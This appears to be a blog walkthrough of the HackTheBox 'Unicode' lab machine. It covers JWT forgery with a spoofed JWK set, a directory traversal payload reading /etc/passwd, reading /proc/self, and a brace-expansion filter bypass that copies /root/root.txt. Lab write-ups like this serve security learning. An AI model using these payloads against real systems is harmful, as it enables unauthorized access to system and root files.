JWK Spoofing, Directory traversal, Unicode normalization, Use /proc to gather info…
Many elements. Much fun.
It took me 2 days to find flags.
I used dirb for the first time. Pre-installed with Kali linux.
Because somehow gobuster kept returning error.
dirb http://10.10.11.126
gobuster dir --url http://10.10.11.126 --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
01:08 JWT token found
JWT token start with ey and has 3 parts.
![](https://nekocyber.com/wp-content/uploads/cocoon-resources/blog-card-cache/f068ccee44718e2c7a937cd84b8adc67.png)
https://github.com/ticarpi/jwt_tool is also available.
03:51 Prepare json file with new key
ssh-keygen -f unicode.key
sudo openssl rsa -text -noout -in unicode.key -modulus
xxd
make a hexdump or do the reverse.
-r reverse operation: convert (or patch) hexdump into binary.
-p output in postscript continuous hexdump style. Also known as plain hexdump style.
hexdump into binary then base64 in one line
echo -n **** | xxd -r -p | base64 -w 0
**** is the modulu of RSA public key.
json file here
{
"keys": [
{
"kty": "RSA",
"use": "sig",
"kid": "hackthebox",
"alg": "RS256",
"n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs",
"e": "AQAB"
}
]
}
n | The modulus for the RSA public key. Base64urlUInt-encoded value |
e | The exponent for the RSA public key. Base64urlUInt-encoded value |
e is usually 65537 = A Q A B.
Why “65537 = A Q A B”?
65537 is 0000 0001: 0000 0000 : 0000 0001
When you shift it to 6 bits for base64, you get
000000 010000 000000 000001
That is A Q A B.
So in this Box, we do not need to modify e as newly created public key says “publicExponent: 65537 (0x10001)” and it’s AQAB in json file.
05:21 Directory traversal vulnerability
/../../../../../../../etc/passwd
05:35 Unicode issue
05:46 /proc investigation
/proc gives you fun info about server & users.
/proc/self/
cmdline — Contains the command issued when starting the process.
cwd — A symbolic link to the current working directory for the process.
environ — A list of the environment variables for the process. The environment variable is given in all upper-case characters, and the value is in lower-case characters.
exe — A symbolic link to the executable of this process.
06:29 Privilege escalation
file: which names files in the file system. The path portion of a file: URL consists of three parts:
a double slash (//)
the name of the system on which the file system is located, followed by a path separator character
root flag is usually at /root/root.txt
Below gets Invalid url error
file:/root/root.txt
file:///root/root.txt
“file” part may be causing a validate error, so added \ somewhere in “file”.
It worked.
However, but no location info on downloaded file.
fi\le:/root/root.txt
f\ile:/root/root.txt
Now we need to specify where to DL.
However space was not accepted as below.
f\ile:/root/root.txt -o /tmp/root.txt
So wrap everything in {}. Then , is recognized as space.
{f\ile:/root/root.txt,-o,/tmp/root.txt}
example
echo {this,is,love}
this is love